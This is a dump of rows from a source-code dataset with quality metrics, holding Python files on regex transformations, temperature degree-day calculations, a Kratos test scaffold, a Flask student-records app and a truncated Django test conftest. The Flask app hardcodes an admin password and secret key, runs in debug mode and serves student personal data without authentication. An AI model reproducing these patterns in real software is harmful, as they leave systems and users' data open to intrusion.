Dataset schema (column and dtype):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
Row 1:

| hexsha | size | ext | lang |
|---|---|---|---|
| 863f656903c4148e82b3b4fd5343ee724e111ab6 | 3,469 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | function/python/brightics/function/textanalytics/regex.py | jhpark428/studio | 539457b3026dda827c1b17b4cb851946e34e3b85 | ["Apache-2.0"] | 202 | 2018-10-23T04:37:35.000Z | 2022-01-27T05:51:10.000Z |
| max_issues | function/python/brightics/function/textanalytics/regex.py | sagarmk/studio | 3bc547fdf85ae6be80c1b40916f9f5d31d2b3f75 | ["MIT"] | 444 | 2018-11-07T08:41:14.000Z | 2022-03-16T06:48:57.000Z |
| max_forks | function/python/brightics/function/textanalytics/regex.py | sagarmk/studio | 3bc547fdf85ae6be80c1b40916f9f5d31d2b3f75 | ["MIT"] | 99 | 2018-11-08T04:12:13.000Z | 2022-03-30T05:36:27.000Z |

content:

```python
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from brightics.common.utils import check_required_parameters
from brightics.common.exception import BrighticsFunctionException
from .data import regex_format_dict
import re
def regex(table, **params):
check_required_parameters(_regex, params, ['table'])
return _regex(table, **params)
def _regex(table, input_cols, transformation_mode='extract', find_mode='all', pattern='',
user_dict_pattern='', custom_pattern='', replacement_string='', user_dict=None):
out_table = table.copy()
pattern_dict = regex_format_dict.pattern_dict
user_pattern_dict = {}
if user_dict is not None:
user_patterns = user_dict.values
for user_pattern in user_patterns:
user_pattern_name = user_pattern[0]
user_pattern_content = user_pattern[1]
user_pattern_dict[user_pattern_name] = user_pattern_dict.get(user_pattern_name, []) + [user_pattern_content]
user_pattern_dict = {key: r'|'.join(value) for key, value in user_pattern_dict.items()}
if pattern == '':
raise BrighticsFunctionException.from_errors([{'0100': "Please choose a pattern."}])
if pattern == 'custom':
raw_pattern = custom_pattern
elif pattern == 'user_dictionary':
raw_pattern = user_pattern_dict.get(user_dict_pattern)
if raw_pattern is None:
raise BrighticsFunctionException.from_errors(
[{'0100': user_dict_pattern + " is not a valid pattern name in the user dictionary."}])
else:
raw_pattern = pattern_dict.get(pattern)
regex_pattern = re.compile(raw_pattern)
def transformation(text):
if transformation_mode == 'extract':
if find_mode == 'first':
result = regex_pattern.search(text)
if result is None:
return ""
else:
return result.group()
else: # find_mode == 'all'
return regex_pattern.findall(text)
elif transformation_mode == 'replace':
if find_mode == 'first':
return regex_pattern.sub(replacement_string, text, 1)
else: # find_mode == 'all'
return regex_pattern.sub(replacement_string, text)
elif transformation_mode == 'remove':
if find_mode == 'first':
return regex_pattern.sub("", text, 1)
else: # find_mode == 'all'
return regex_pattern.sub("", text)
else: # transformation_mode == 'split'
if find_mode == 'first':
return regex_pattern.split(text, 1)
else: # find_mode == 'all'
return regex_pattern.split(text)
for col in input_cols:
result_col = table[col].apply(transformation)
out_table['regex_' + col] = result_col
    return {'out_table': out_table}
```
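
The transformation above is a thin closure over Python's `re` module applied column-wise with pandas. A minimal sketch of the `extract`/`all` path, with an illustrative digit pattern and column name (the real pattern names are looked up in `regex_format_dict.pattern_dict`):

```python
import re
import pandas as pd

# Illustrative stand-ins for a pattern and input table.
regex_pattern = re.compile(r'\d+')
table = pd.DataFrame({'text': ['room 101', 'no digits here', '7 of 9']})

# transformation_mode='extract' with find_mode='all' boils down to findall:
table['regex_text'] = table['text'].apply(regex_pattern.findall)
print(table['regex_text'].tolist())  # [['101'], [], ['7', '9']]
```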

avg_line_length 40.811765, max_line_length 120, alphanum_fraction 0.643701. Non-zero quality signals (`qsc_code_…_quality_signal`, prefix/suffix dropped; `py:` = `qsc_codepython_…`): num_words 418, num_chars 3,469, mean_word_length 5.114833, frac_words_unique 0.311005, frac_chars_top_2grams 0.07203, frac_chars_top_3grams 0.058934, frac_chars_top_4grams 0.028064, frac_chars_dupe_5grams 0.260992, frac_chars_dupe_6grams 0.138447, frac_chars_dupe_7grams 0.138447, frac_chars_dupe_8grams 0.089804, frac_chars_dupe_9grams 0.056127, frac_chars_dupe_10grams 0.038354, frac_chars_digital 0.008242, frac_chars_whitespace 0.265494, size_file_byte 3,469, num_lines 84, num_chars_line_max 121, num_chars_line_mean 41.297619, frac_chars_alphabet 0.830848, frac_chars_comments 0.189968, frac_lines_dupe_lines 0.183333, frac_chars_string_length 0.064093, py:cate_ast 1, py:frac_lines_func_ratio 0.05, py:cate_var_zero false, py:frac_lines_import 0.066667, py:score_lines_no_logic 0.3. All other quality-signal columns are 0; the trailing raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 2:

| hexsha | size | ext | lang |
|---|---|---|---|
| 863fffaabccfedecd9149dc35acae6b9542aa04c | 8,500 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | bin/temperature_functions.py | travc/outbreak-reporter | 0f03ca66993827ae1866d09e3cf5d9f6d4acb633 | ["MIT"] | null | null | null |
| max_issues | bin/temperature_functions.py | travc/outbreak-reporter | 0f03ca66993827ae1866d09e3cf5d9f6d4acb633 | ["MIT"] | 2 | 2019-12-15T19:58:26.000Z | 2019-12-17T05:33:32.000Z |
| max_forks | bin/temperature_functions.py | travc/outbreak-reporter | 0f03ca66993827ae1866d09e3cf5d9f6d4acb633 | ["MIT"] | 1 | 2022-03-04T01:36:38.000Z | 2022-03-04T01:36:38.000Z |

content:

```python
#!/usr/bin/env python3
import sys
import os
import logging
import numpy as np
import pandas as pd
import dateutil
def tempF2C(x): return (x-32.0)*5.0/9.0
def tempC2F(x): return (x*9.0/5.0)+32.0
def load_temperature_hdf5(temps_fn, local_time_offset, basedir=None, start_year=None, truncate_to_full_day=False):
## Load temperature
# temps_fn = "{}_AT_cleaned.h5".format(station_callsign)
logging.info("Using saved temperatures file '{}'".format(temps_fn))
if basedir is not None:
temps_fn = os.path.join(basedir, temps_fn)
tempdf = pd.read_hdf(temps_fn, 'table')
tmp = local_time_offset.split(':')
tmp = int(tmp[0])*3600+int(tmp[1])*60
sitetz = dateutil.tz.tzoffset(local_time_offset, tmp)
tempdf.index = tempdf.index.tz_convert(sitetz)
if truncate_to_full_day:
x = tempdf.index[-1]
if x.hour != 23:
x = x-pd.Timedelta(days=1)
tmp = '{:04d}-{:02d}-{:02d}'.format(x.year, x.month, x.day)
tempdf = tempdf.loc[:tmp]
if start_year is not None:
tempdf = tempdf.loc['{}-01-01'.format(start_year):]
logging.info("Temperature data date range used: {} through {}".format(tempdf.index[0], tempdf.index[-1]))
return tempdf
def load_temperature_csv(fn, local_time_offset=None):
t = pd.read_csv(fn, index_col=0)
if local_time_offset is not None:
tmp = local_time_offset.split(':')
tmp = int(tmp[0])*3600+int(tmp[1])*60
sitetz = dateutil.tz.tzoffset(local_time_offset, tmp)
#t.index = pd.to_datetime(t.index).tz_localize('UTC').tz_convert(sitetz) # @TCC this fails if csv contains datetimes with TZ
t.index = pd.to_datetime(t.index)
try:
t.index = t.index.tz_localize('UTC')
except TypeError:
pass
t.index = t.index.tz_convert(sitetz)
return t
# Function which computes BM (single sine method) degree day generation from temperature data
def compute_BMDD_Fs(tmin, tmax, base_temp, dd_gen):
# Used internally
    def _compute_daily_BM_DD(mint, maxt, avet, base_temp):
        """Use the standard Baskerville-Emin (single sine) degree-day method
        to compute the degree-day value for a single day.
"""
if avet is None:
avet = (mint+maxt)/2.0 # simple midpoint (like in the refs)
dd = np.nan # value which we're computing
# Step 1: Adjust for observation time; not relevant
# Step 2: GDD = 0 if max < base (curve all below base)
if maxt < base_temp:
dd = 0
# Step 3: Calc mean temp for day; already done previously
# Step 4: min > base; then whole curve counts
elif mint >= base_temp:
dd = avet - base_temp
# Step 5: else use curve minus part below base
else:
W = (maxt-mint)/2.0
tmp = (base_temp-avet) / W
if tmp < -1:
print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp))
tmp = -1
if tmp > 1:
print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp))
tmp = 1
A = np.arcsin(tmp)
dd = ((W*np.cos(A))-((base_temp-avet)*((np.pi/2.0)-A)))/np.pi
return dd
# compute the degree-days for each day in the temperature input (from tmin and tmax vectors)
dd = pd.concat([tmin,tmax], axis=1)
dd.columns = ['tmin', 'tmax']
dd['DD'] = dd.apply(lambda x: _compute_daily_BM_DD(x[0], x[1], (x[0]+x[1])/2.0, base_temp), axis=1)
# compute the degree-days for each day in the temperature input (from a daily groupby)
# grp = t.groupby(pd.TimeGrouper('D'))
# dd = grp.agg(lambda x: _compute_daily_BM_DD(np.min(x), np.max(x), None, base_temp))
# dd.columns = ['DD']
# Find the point where cumulative sums of degree days cross the threshold
cDD = dd['DD'].cumsum(skipna=True)
for cumdd_threshold,label in [[1*dd_gen,'F1'], [2*dd_gen,'F2'], [3*dd_gen,'F3']]:
dtmp = np.zeros(len(dd['DD']))*np.nan
tmp = np.searchsorted(cDD, cDD+(cumdd_threshold)-dd['DD'], side='left').astype(float)
tmp[tmp>=len(tmp)] = np.nan
#dd[label+'_idx'] = tmp
# convert those indexes into end times
e = pd.Series(index=dd.index, dtype='float64')#, dtype='datetime64[ns]')
#e[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)] # @TCC previous code
e.loc[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)]
e.loc[np.isnan(tmp)] = np.nan
dd[label+'_end'] = e
# and duration...
#dd[label] = (e-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days) # @TCC previous code
dd[label] = (pd.to_datetime(e)-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days)
#dd.loc[np.isnan(tmp), label] = np.nan
print("DD dataframe min values\n", dd.min())
return dd
def compute_year_over_year_norm(in_dataframe,
start, end,
norm_start=None, norm_end=None,
freq='daily',
interp_method='linear',
norm_method='mean'):
"""
Parameters
----------
    start : convertible to Datetime
        start of the date range to output
    end : convertible to Datetime
        end of the date range to output
    norm_start : convertible to Datetime or None
        `None` will use in_dataframe.index[0]
    norm_end : convertible to Datetime or None
        if given (not None), the norm range does not include `norm_end` (it is half-open);
        `None` will use in_dataframe.index[-1]
freq : {'daily', 'hourly'}
interp_method : str or None
`None` will skip resample and interpolation, so
`in_dataframe` must already be daily or hourly (depending on `freq`)!
norm_method : {'mean', 'median'}
"""
if freq == 'hourly':
hrs = 24
hrs_freq = '1h'
elif freq == 'daily':
hrs = 1
hrs_freq = '24h'
else:
raise ValueError("Invalid `freq` argument value: {}".format(freq))
if norm_start is None:
norm_start = in_dataframe.index[0]
if norm_end is None:
norm_end = in_dataframe.index[-1]
else:
norm_end = pd.to_datetime([norm_end])[0] - pd.Timedelta('1 second')
print('Computing using range:', norm_start, 'to', norm_end)
if interp_method is None: # skip resample+interpolation (assumes in_dataframe is daily!)
t = in_dataframe.loc[norm_start:norm_end]
else: # resample and interpolate to get hourly
t = in_dataframe.resample(hrs_freq).interpolate(method=interp_method).loc[norm_start:norm_end]
if norm_method == 'mean':
norm = t.groupby([t.index.month, t.index.day, t.index.hour]).mean().sort_index()
elif norm_method == 'median':
norm = t.groupby([t.index.month, t.index.day, t.index.hour]).median().sort_index()
else:
assert False, "Error: Unknown norm_method '{}'".format(norm_method)
# now replicate and trim to the desired output range
start = pd.to_datetime(start)
end = pd.to_datetime(end)
# need a non-leapyear and leapyear version
norm_ly = norm.copy()
if norm.shape[0] == 366*hrs:
norm = norm.drop((2,29,))
else: # norm doesn't include any leapyear data
assert norm.shape[0] == 365*hrs
# make Feb 29 the mean of Feb 28 and Mar 1
foo = (norm.loc[(2,28,)] + norm.loc[(3,1,)]) / 2.0
foo.index = pd.MultiIndex.from_product( ([2],[29],list(range(hrs))) )
norm_ly = pd.concat((norm_ly,foo)).sort_index()
norm_ly.sort_index(inplace=True) # probably not needed
# build up a 'long normal' (lnorm) dataframe year by year by appending the norm or norm_ly
lnorm = None
for yr in np.arange(start.year, end.year+1):
#print(yr)
idx = pd.date_range(start='{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[0]),
end= '{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[-1]),
freq=hrs_freq)
if idx.shape[0] == 366*hrs:
foo = norm_ly.copy()
else:
assert norm.shape[0] == 365*hrs
foo = norm.copy()
foo.index = idx
if lnorm is None:
lnorm = foo
else:
lnorm = lnorm.append(foo)
    return lnorm.loc[start:end]
```
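
A worked check of the single-sine step in `_compute_daily_BM_DD`, using made-up temperatures where the base crosses the daily curve (`mint < base_temp < maxt`):

```python
import numpy as np

# Illustrative values: mint=10, maxt=20, base_temp=12.
mint, maxt, base_temp = 10.0, 20.0, 12.0
avet = (mint + maxt) / 2.0             # 15.0, the simple midpoint
W = (maxt - mint) / 2.0                # 5.0, half the daily range
A = np.arcsin((base_temp - avet) / W)  # arcsin(-0.6)
dd = ((W * np.cos(A)) - ((base_temp - avet) * ((np.pi / 2.0) - A))) / np.pi
print(round(dd, 4))                    # 3.3877 degree-days
```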

avg_line_length 41.062802, max_line_length 132, alphanum_fraction 0.598. Non-zero quality signals: num_words 1,259, num_chars 8,500, mean_word_length 3.926926, frac_words_unique 0.250993, frac_chars_top_2grams 0.01699, frac_chars_top_3grams 0.021238, frac_chars_top_4grams 0.009709, frac_chars_dupe_5grams 0.234426, frac_chars_dupe_6grams 0.188107, frac_chars_dupe_7grams 0.158981, frac_chars_dupe_8grams 0.149272, frac_chars_dupe_9grams 0.149272, frac_chars_dupe_10grams 0.137136, frac_chars_digital 0.025862, frac_chars_whitespace 0.263059, size_file_byte 8,500, num_lines 206, num_chars_line_max 133, num_chars_line_mean 41.262136, frac_chars_alphabet 0.76341, frac_chars_comments 0.294118, frac_lines_dupe_lines 0.149254, frac_chars_string_length 0.081514, frac_lines_assert 0.022388, py:cate_ast 1, py:frac_lines_func_ratio 0.052239, py:cate_var_zero false, py:frac_lines_pass 0.007463, py:frac_lines_import 0.044776, py:frac_lines_simplefunc 0.014925, py:score_lines_no_logic 0.134328, py:frac_lines_print 0.029851. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 3:

| hexsha | size | ext | lang |
|---|---|---|---|
| 864003328f8b49eae739c102dea7da6313ecab13 | 2,584 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | ["BSD-4-Clause"] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z |
| max_issues | applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | ["BSD-4-Clause"] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z |
| max_forks | applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | ["BSD-4-Clause"] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z |

content:

```python
# import Kratos
import KratosMultiphysics
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
import KratosMultiphysics.CSharpWrapperApplication as CSharpWrapperApplication
import run_cpp_unit_tests
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import subprocess
import subprocess
# Using kratos_utilities
import KratosMultiphysics.kratos_utilities as kratos_utilities
if kratos_utilities.CheckIfApplicationsAvailable("ExternalSolversApplication"):
has_external_solvers_application = True
else:
has_external_solvers_application = False
# Import the tests of test_classes to create the suites
## SMALL TESTS
## NIGHTLY TESTS
## VALIDATION TESTS
def AssembleTestSuites():
    ''' Populates the test suites to run.
    Populates the test suites to run. At least, it should populate the suites:
    "small", "nightly" and "all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
    # Create a test suite with the selected tests (Small tests):
    smallSuite = suites['small']
    # Create a test suite with the selected tests plus all small tests
nightlySuite = suites['nightly']
### BEGIN SMALL SUITE ###
### END SMALL SUITE ###
### BEGIN NIGHTLY SUITE ###
    ### END NIGHTLY SUITE ###
### BEGIN VALIDATION SUITE ###
    # For very long tests that should not be in nightly, and which you can use to validate
validationSuite = suites['validation']
validationSuite.addTests(nightlySuite)
### END VALIDATION ###
    # Create a test suite that contains all the tests:
allSuite = suites['all']
allSuite.addTests(nightlySuite) # Already contains the smallSuite
validationSuite.addTests(allSuite) # Validation contains all
# Manual list for debugging
#allSuite.addTests(
#KratosUnittest.TestLoader().loadTestsFromTestCases([
#### STANDALONE
#### SMALL
        #### NIGHTLY
#### VALIDATION
#])
#)
return suites
if __name__ == '__main__':
KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning cpp unit tests ...")
run_cpp_unit_tests.run()
KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished running cpp unit tests!")
KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning python tests ...")
KratosUnittest.runTests(AssembleTestSuites())
    KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished python tests!")
```
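
The suite lists above are empty placeholders. A sketch of how a case would be registered, following the commented-out loader pattern at the end of `AssembleTestSuites` (`TestFoo` is hypothetical):

```python
import KratosMultiphysics.KratosUnittest as KratosUnittest

class TestFoo(KratosUnittest.TestCase):
    def test_addition(self):
        self.assertEqual(1 + 1, 2)

# Inside AssembleTestSuites(), after smallSuite = suites['small']:
# smallSuite.addTests(
#     KratosUnittest.TestLoader().loadTestsFromTestCases([TestFoo]))
```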

avg_line_length 29.363636, max_line_length 90, alphanum_fraction 0.71904. Non-zero quality signals: num_words 267, num_chars 2,584, mean_word_length 6.861423, frac_words_unique 0.370787, frac_chars_top_2grams 0.065502, frac_chars_top_3grams 0.026201, frac_chars_top_4grams 0.091703, frac_chars_dupe_5grams 0.176856, frac_chars_dupe_6grams 0.067686, frac_chars_dupe_7grams 0.03821, frac_chars_dupe_8grams 0.03821, frac_chars_whitespace 0.195046, size_file_byte 2,584, num_lines 87, num_chars_line_max 91, num_chars_line_mean 29.701149, frac_chars_alphabet 0.880769, frac_chars_comments 0.379257, frac_chars_string_length 0.135786, frac_chars_long_word_length 0.017391, py:cate_ast 1, py:frac_lines_func_ratio 0.035714, py:cate_var_zero false, py:frac_lines_import 0.25, py:score_lines_no_logic 0.321429. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 4:

| hexsha | size | ext | lang |
|---|---|---|---|
| 86421594cd7a65136f722a4e9889059ae90e1d77 | 2,145 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | run.py | Ganeshrockz/Flask-Python-Dev | 522b280484e8f4cf3877b378a1334c501ffbc41e | ["Apache-2.0"] | null | null | null |
| max_issues | run.py | Ganeshrockz/Flask-Python-Dev | 522b280484e8f4cf3877b378a1334c501ffbc41e | ["Apache-2.0"] | null | null | null |
| max_forks | run.py | Ganeshrockz/Flask-Python-Dev | 522b280484e8f4cf3877b378a1334c501ffbc41e | ["Apache-2.0"] | null | null | null |

content:

```python
from flask import Flask, flash, render_template, redirect, url_for
from flask_pymongo import PyMongo  # the flask.ext.* import style was removed in Flask 1.0
from flask import request
app=Flask(__name__)
app.config['MONGO_DBNAME']='stud'
app.config['MONGO_URI']='mongodb://localhost:27017/stud'
mongo=PyMongo(app)
"""
@app.route('/add')
def add():
user=mongo.db.users
user.insert({"name":"Ganesh","age":19})
return "Added"
@app.route('/find')
def find():
user=mongo.db.users
data=user.find_one({"name":"Ganesh"})
return data["name"]
"""
@app.route('/',methods=['GET', 'POST'])
def dashboard():
if request.method == 'POST':
name=request.form['name']
passw=request.form['password']
if name=="admin123" and passw=="12345":
return redirect(url_for('display'))
else:
return render_template("dashboard.html",err="Login Failed")
else:
return render_template("dashboard.html")
@app.route('/form',methods=['GET', 'POST'])
def form():
if request.method == 'POST':
user=mongo.db.student
rollno=request.form['rollno']
name=request.form['name']
address=request.form['address']
year=request.form['year']
skills=request.form['skills']
phone=request.form['phone']
email=request.form['emailid']
user.insert({"Rollnumber":rollno,"StudentName":name,"Address":address,"Year":year,"Skills":skills,"PhoneNumber":phone,"EmailId":email})
return redirect(url_for('dashboard'))
else:
return render_template("form.html")
@app.route('/display',methods=['GET', 'POST'])
def display():
data=mongo.db.student
record=[]
for rec in data.find():
record.append({"Rollnumber":rec["Rollnumber"],"StudentName":rec["StudentName"],"Address":rec["Address"],"Year":rec["Year"],"Skills":rec["Skills"],"PhoneNumber":rec["PhoneNumber"],"EmailId":rec["EmailId"]})
app.logger.info(record)
return render_template("display.html", studentdata=record)
if __name__ == '__main__':
app.secret_key = 'ganeshrockz'
    app.run(debug=True)
```
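
Since `flask.ext.*` no longer exists, the corrected import above maps to the standalone Flask-PyMongo package. A minimal modern setup sketch (with Flask-PyMongo 2.x the database name comes from the URI, so the `MONGO_DBNAME` key is unnecessary):

```python
from flask import Flask
from flask_pymongo import PyMongo

app = Flask(__name__)
app.config['MONGO_URI'] = 'mongodb://localhost:27017/stud'
mongo = PyMongo(app)
# mongo.db now refers to the 'stud' database named in the URI.
```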

avg_line_length 35.75, max_line_length 213, alphanum_fraction 0.620513. Non-zero quality signals: num_words 253, num_chars 2,145, mean_word_length 5.166008, frac_words_unique 0.316206, frac_chars_top_2grams 0.075746, frac_chars_top_3grams 0.061209, frac_chars_top_4grams 0.039021, frac_chars_dupe_5grams 0.056618, frac_chars_dupe_6grams 0.056618, frac_chars_digital 0.008711, frac_chars_whitespace 0.197203, size_file_byte 2,145, num_lines 59, num_chars_line_max 214, num_chars_line_mean 36.355932, frac_chars_alphabet 0.75029, frac_lines_dupe_lines 0.159091, frac_chars_string_length 0.224921, frac_chars_long_word_length 0.015839, py:cate_ast 1, py:frac_lines_func_ratio 0.068182, py:cate_var_zero false, py:frac_lines_pass 0.045455, py:frac_lines_import 0.068182, py:score_lines_no_logic 0.272727. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 5:

| hexsha | size | ext | lang |
|---|---|---|---|
| 86448f12322f6a8ff13f239dbc2163cdebce1c56 | 12,198 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | resources/tests/conftest.py | jussiarpalahti/respa | c308bcb96e56d9401e22df94d3073e248618e243 | ["MIT"] | null | null | null |
| max_issues | resources/tests/conftest.py | jussiarpalahti/respa | c308bcb96e56d9401e22df94d3073e248618e243 | ["MIT"] | null | null | null |
| max_forks | resources/tests/conftest.py | jussiarpalahti/respa | c308bcb96e56d9401e22df94d3073e248618e243 | ["MIT"] | null | null | null |

content:

```python
# -*- coding: utf-8 -*-
import pytest
import datetime
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from rest_framework.test import APIClient, APIRequestFactory
from resources.enums import UnitAuthorizationLevel
from resources.models import Resource, ResourceType, Unit, Purpose, Day, Period
from resources.models import Equipment, EquipmentAlias, ResourceEquipment, EquipmentCategory, TermsOfUse, ResourceGroup
from resources.models import AccessibilityValue, AccessibilityViewpoint, ResourceAccessibility, UnitAccessibility
from munigeo.models import Municipality
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def staff_api_client(staff_user):
api_client = APIClient()
api_client.force_authenticate(user=staff_user)
return api_client
@pytest.fixture
def user_api_client(user):
api_client = APIClient()
api_client.force_authenticate(user=user)
return api_client
@pytest.fixture(params=[None, 'user', 'staff_user'])
def all_user_types_api_client(request):
api_client = APIClient()
if request.param:
api_client.force_authenticate(request.getfixturevalue(request.param))
return api_client
@pytest.fixture
def api_rf():
return APIRequestFactory()
@pytest.mark.django_db
@pytest.fixture
def space_resource_type():
return ResourceType.objects.get_or_create(id="test_space", name="test_space", main_type="space")[0]
@pytest.mark.django_db
